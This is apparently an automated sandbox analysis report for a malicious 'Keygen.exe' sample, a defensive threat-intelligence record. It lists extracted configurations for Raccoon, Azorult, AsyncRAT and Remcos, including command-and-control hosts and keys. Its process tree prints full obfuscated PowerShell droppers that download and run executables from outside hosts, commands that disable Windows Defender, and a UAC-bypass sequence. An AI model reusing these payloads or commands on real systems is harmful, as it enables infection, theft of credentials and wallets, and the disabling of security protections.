Resubmissions
12-11-2021 18:04
211112-wnzb8aahhm 1019-11-2020 10:08
201119-rhwlt38jrx 1018-11-2020 17:26
201118-htd4fq29va 10Analysis
-
max time kernel
1805s -
max time network
1820s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
19-11-2020 10:08
General
-
Target
Keygen.exe
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhHT
exe.dropper
http://bit.do/fqhHT
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://zxvbcrt.ug/zxcvb.exe
exe.dropper
http://zxvbcrt.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJv
exe.dropper
http://bit.do/fqhJv
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://pdshcjvnv.ug/zxcvb.exe
exe.dropper
http://pdshcjvnv.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJD
exe.dropper
http://bit.do/fqhJD
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://rbcxvnb.ug/zxcvb.exe
exe.dropper
http://rbcxvnb.ug/zxcvb.exe
Extracted
Family
raccoon
Botnet
5e4db353b88c002ba6466c06437973619aad03b3
Attributes
-
url4cnc
https://telete.in/brikitiki
rc4.plain
rc4.plain
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
asyncrat
Version
0.5.7B
C2
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
Mutex
AsyncMutex_6SI8OkPnk
Attributes
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
aes.plain
Extracted
Family
remcos
C2
taenaia.ac.ug:6969
agentpapple.ac.ug:6969
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Async RAT payload 3 IoCs
-
ModiLoader First Stage 2 IoCs
-
Blocklisted process makes network request 6 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
-
Loads dropped DLL 13 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 4 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 3 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8487.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8487.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\omx.exe"C:\Users\Public\omx.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 2440 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\897638703164392\\* & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 24409⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\omx.exe"C:\Users\Public\omx.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ys0nsVDvlk.exe"C:\Users\Admin\AppData\Local\Temp\ys0nsVDvlk.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\XqKMNtso.bat" "9⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I10⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\XqKMNtso.bat" "9⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\fbsgi511.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\omx.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xvb.exe"C:\Users\Public\xvb.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 1028 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\919755189621101\\* & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 102810⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"{path}"7⤵
- Executes dropped EXE
-
C:\Users\Public\xvb.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tr1M5TzQok.exe"C:\Users\Admin\AppData\Local\Temp\tr1M5TzQok.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\pcidrymb.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xvb.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\ywq.exe"C:\Users\Public\ywq.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\mmfwhmpi.exe2⤵
-
C:\Windows\temp\mmfwhmpi.exeC:\Windows\temp\mmfwhmpi.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
